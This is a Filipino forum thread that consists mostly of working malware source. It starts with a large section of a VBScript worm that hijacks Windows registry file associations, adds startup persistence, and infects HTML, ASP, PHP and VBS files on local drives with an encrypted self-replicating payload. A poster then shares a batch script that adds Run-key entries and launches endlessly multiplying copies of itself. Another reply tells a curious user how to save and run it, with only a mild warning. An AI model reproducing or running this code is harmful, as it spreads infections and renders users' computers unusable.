WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function

Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder(ThisLocation)
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
Else
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else
Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Next
Dim OtherArr(3)
Randomize
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
Next
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
Next
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
End If
End Function
 
hirap talaga i-recompile kapag decompiled, kasi di kasama yung ibang code library, lalo na kung user-define library..


mas madali pa ang VBS Virus:giggle:


saka available sa net ung source code:lol:
 
ITo naman BAt. file Maiinis ka lng naman dito kc ako uminit ulo ko...


@echo off
del C:\1.reg
>>"C:\1.reg" ECHO Windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1

start C:\2.bat
Click to expand...


save as anything.bat

Dont Try mGA pArekoy ha... pang pasakit ng Ulo YAn....
 
panu ba to gamitin? gs2 ko malaman? pde paturo cnu pde mag turo sken? :D ahehe
 
arwin00139 said:
panu ba to gamitin? gs2 ko malaman? pde paturo cnu pde mag turo sken? :D ahehe
Click to expand...

simple lang. just copy that codes into notepad and save it into .bat file. but if i were you, don't do this harmful things. someday, you won't know, this thing will be affect and get slow your system. so the good thing to do is find out solution on how to keep away this in our system when we're getting infected with this. :D
 
You must log in or register to reply here.

Similar threads

motoro
Is there anything malicious about this script? Need help.
Replies
1
Views
458
ippo28
I
yasoumastura
HELP: DV 235T Di maaccess gui at telnet pag admin gagamitin
Replies
0
Views
414
yasoumastura
yasoumastura
W
  • Locked
Ito pala yung love letter :)
Replies
1
Views
423
zonvik
zonvik
E
[Help]Ms access VBA Code "Import Excel File to Access Table"
Replies
1
Views
926
ramlei
R
soulviviv
(BASIC OPENVPN GUI)HSSXPT VPN_TUT_VB2008 express edition
13 14 15 16 17
Replies
335
Views
30K
eugcar
eugcar
Back
Top Bottom